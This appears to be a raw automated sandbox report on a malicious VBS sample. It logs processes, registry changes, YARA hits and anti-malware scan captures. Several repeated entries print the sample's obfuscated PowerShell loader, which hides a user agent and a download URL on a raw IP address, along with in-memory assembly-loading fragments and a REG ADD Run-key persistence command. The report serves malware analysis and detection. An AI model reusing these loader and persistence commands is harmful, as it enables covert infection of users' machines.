Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5692
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6096

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\PING.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\PING.EXE	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping google.com -n 1	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\PING.EXE ping %.%.%.%	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: Yara match	File source: 0000000B.00000002.2879459016.000000000CE4E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2868524375.0000000005C62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fredsbevaegelse133)$global:Pelsdyrfarm = [System.Text.Encoding]::ASCII.GetString($Incoalescence)$global:Sildefiskerne=$Pelsdyrfarm.substring(319853,28417)<#ricin Prsenteret Slagterbn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Stenksers $Reliefskrift $Indicatives), (Sleddings @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trktjers = [AppDomain]::CurrentDomain.GetAssemblies()$glo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Egenlige)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Supporteres, $false).DefineType($feriekolonierne
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fredsbevaegelse133)$global:Pelsdyrfarm = [System.Text.Encoding]::ASCII.GetString($Incoalescence)$global:Sildefiskerne=$Pelsdyrfarm.substring(319853,28417)<#ricin Prsenteret Slagterbn

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C00BD pushad ; iretd	8_2_00007FFD348C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C0A08 push E95B63D0h; ret	8_2_00007FFD348C09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348C0988 push E95B63D0h; ret	8_2_00007FFD348C09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD349971C8 push esp; retf	8_2_00007FFD349971C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0308333B pushfd ; retf	11_2_030833C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_030833AD pushad ; retf	11_2_030833B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_076408D8 push eax; mov dword ptr [esp], ecx	11_2_07640AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_0764B144 push 8B6BAABFh; iretd	11_2_0764B149
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07640AB8 push eax; mov dword ptr [esp], ecx	11_2_07640AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08452AF5 push ebx; ret	11_2_08452B32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08452B41 push ebx; ret	11_2_08452B32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08452B63 push ebx; ret	11_2_08452B32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31 push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31 push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_244A1BFF push eax; iretd	17_3_244A1C31
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_244AAF9A push ss; iretd	17_3_244AAFE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975E1A push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_0897839E push 8BFFFFFBh; retf	17_3_089783A3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31 push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_3_08975D31 push AA369B36h; iretd	17_3_08975E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_2481D4F2 push 0E0004C8h; retf	17_2_2481DA45
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248127FA pushad ; ret	17_2_248127F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_2481B008 push es; iretd	17_2_2481B009
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_2481D82D push 0E0004C8h; retf	17_2_2481DA45
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24819939 push es; iretd	17_2_24819940
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_2481283D push eax; iretd	17_2_24812858
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_2481DA5A push 0E0004C8h; retf	17_2_2481DA45
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_2481225F pushad ; ret	17_2_248127F9

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Achaque			Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJL			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4992	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4925	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8086	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1703	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 966	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 4256	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2788	Thread sleep count: 8086 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep count: 1703 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1492	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
